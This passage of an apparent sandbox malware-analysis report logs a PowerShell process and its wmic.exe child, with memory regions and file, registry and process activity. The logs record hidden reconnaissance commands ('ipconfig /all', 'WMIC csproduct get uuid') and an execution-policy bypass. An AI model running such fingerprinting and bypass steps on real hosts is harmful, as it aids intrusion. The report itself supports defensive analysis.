| cscapi.dll | 0x7fef9bc0000 | 0x7fef9bcefff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb730000 | 0x7fefb73afff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb760000 | 0x7fefb778fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd980000 | 0x7fefd9a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00020000 | 0x7ff00020000 | 0x7ff0002ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff000dffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000e0000 | 0x7ff000e0000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff0015ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00160000 | 0x7ff00160000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff00000 | 0x7fffff00000 | 0x7fffff0ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff9ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 66 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (90)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
2 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create Pipe | Anonymous read pipe | size = 0 |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
21 | |
| Read | - | size = 4096, size_out = 3022 |
|
1 | |
| Read | - | size = 50, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
2 | |
| Read | - | size = 4096, size_out = 281 |
|
1 | |
| Read | - | size = 4096, size_out = 30 |
|
1 | |
| Read | - | size = 4096, size_out = 48 |
|
2 | |
| Read | - | size = 4096, size_out = 41 |
|
6 | |
| Read | - | size = 4096, size_out = 47 |
|
1 | |
| Read | - | size = 4096, size_out = 43 |
|
4 | |
| Read | - | size = 4096, size_out = 45 |
|
1 | |
| Read | - | size = 4096, size_out = 80 |
|
1 | |
| Read | - | size = 4096, size_out = 58 |
|
1 | |
| Read | - | size = 4096, size_out = 44 |
|
4 | |
| Read | - | size = 4096, size_out = 81 |
|
1 | |
| Read | - | size = 4096, size_out = 66 |
|
1 | |
| Read | - | size = 4096, size_out = 54 |
|
1 | |
| Read | - | size = 4096, size_out = 78 |
|
1 | |
| Read | - | size = 4096, size_out = 77 |
|
1 | |
| Read | - | size = 4096, size_out = 52 |
|
3 | |
| Read | - | size = 4096, size_out = 50 |
|
1 | |
| Read | - | size = 4096, size_out = 82 |
|
1 | |
| Read | - | size = 4096, size_out = 67 |
|
1 | |
| Read | - | size = 4096, size_out = 59 |
|
2 | |
| Read | - | size = 4096, size_out = 65 |
|
1 | |
| Read | - | size = 4096, size_out = 64 |
|
2 | |
| Read | - | size = 4096, size_out = 55 |
|
1 | |
| Read | - | size = 4096, size_out = 74 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
2 | |
| Read | - | size = 4096, size_out = 3 |
|
1 | |
| Write | - | size = 2 |
|
1 | |
| Write | CONOUT$ | size = 2 |
|
1 |
Registry (57)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Read Value | - | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | - | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | - | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Windows\system32\ipconfig.exe" /all | os_pid = 0xacc, startup_flags = STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Windows\System32\Wbem\WMIC.exe" csproduct get uuid | os_pid = 0x7ac, startup_flags = STARTF_USESTDHANDLES, show_window = SW_HIDE |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
5 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (23)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
5 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (78)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
68 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PATH |
|
1 | |
| Get Environment String | name = PATH, result_out = %SystemRoot%\system32\WindowsPowerShell\v1.0\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 |
Process #21: wmic.exe
33
0
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\system32\wbem\wmic.exe |
| Command Line | "C:\Windows\System32\Wbem\WMIC.exe" csproduct get uuid |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:14, Reason: Child Process |
| Unmonitor | End Time: 00:04:18, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7ac |
| Parent PID | 0x740 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
140
0x
980
0x
9DC
0x
5A8
0x
5FC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| wmic.exe.mui | 0x000e0000 | 0x000effff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | r |
|
|
|
- |
| msxml3r.dll | 0x00140000 | 0x00140fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0016ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x00200000 | 0x00200fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00200fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00211fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00220000 | 0x0022bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x00230000 | 0x00237fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00750fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x01b5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| rpcss.dll | 0x01b60000 | 0x01bdcfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001b60000 | 0x01b60000 | 0x01bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001be0000 | 0x01be0000 | 0x01c5ffff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x01c60000 | 0x01c6ffff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000001c70000 | 0x01c70000 | 0x01c76fff | Pagefile Backed Memory | rw |
|
|
|
- |
| msxml3.dll | 0x01c70000 | 0x01c8afff | Memory Mapped File | r |
|
|
|
- |
| stdole2.tlb | 0x01c90000 | 0x01c93fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001ca0000 | 0x01ca0000 | 0x01d1ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01d20000 | 0x01feefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001ff0000 | 0x01ff0000 | 0x020cffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x01ff0000 | 0x02034fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002050000 | 0x02050000 | 0x020cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000020d0000 | 0x020d0000 | 0x0222ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x020d0000 | 0x0218ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000021b0000 | 0x021b0000 | 0x0222ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x0239ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x022dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002320000 | 0x02320000 | 0x0239ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023a0000 | 0x023a0000 | 0x024effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024f0000 | 0x024f0000 | 0x0262ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002510000 | 0x02510000 | 0x0258ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025b0000 | 0x025b0000 | 0x0262ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x027bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x0272ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x027bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027c0000 | 0x027c0000 | 0x02bbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002bc0000 | 0x02bc0000 | 0x02c9efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002d20000 | 0x02d20000 | 0x02d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002de0000 | 0x02de0000 | 0x02e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e60000 | 0x02e60000 | 0x02f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f60000 | 0x02f60000 | 0x0356cfff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| wmic.exe | 0xffef0000 | 0xfff7cfff | Memory Mapped File | rwx |
|
|
|
- |
| msxml3.dll | 0x7fee1b90000 | 0x7fee1d63fff | Memory Mapped File | rwx |
|
|
|
- |
| framedynos.dll | 0x7fee2b30000 | 0x7fee2b7bfff | Memory Mapped File | rwx |
|
|
|
- |
| vbscript.dll | 0x7fef3650000 | 0x7fef36e9fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7fef5e10000 | 0x7fef5e23fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x7fef6370000 | 0x7fef6396fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7fef63a0000 | 0x7fef6481fff | Memory Mapped File | rwx |
|
|
|
- |
| wmi2xml.dll | 0x7fef9320000 | 0x7fef9333fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefb670000 | 0x7fefb67afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7fefb680000 | 0x7fefb6a6fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7fefbcd0000 | 0x7fefbd55fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7fefbee0000 | 0x7fefbef0fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7fefbf00000 | 0x7fefbf0efff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7fefd2a0000 | 0x7fefd2fafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7fefda20000 | 0x7fefda2afff | Memory Mapped File | rwx |
|
|
|
- |
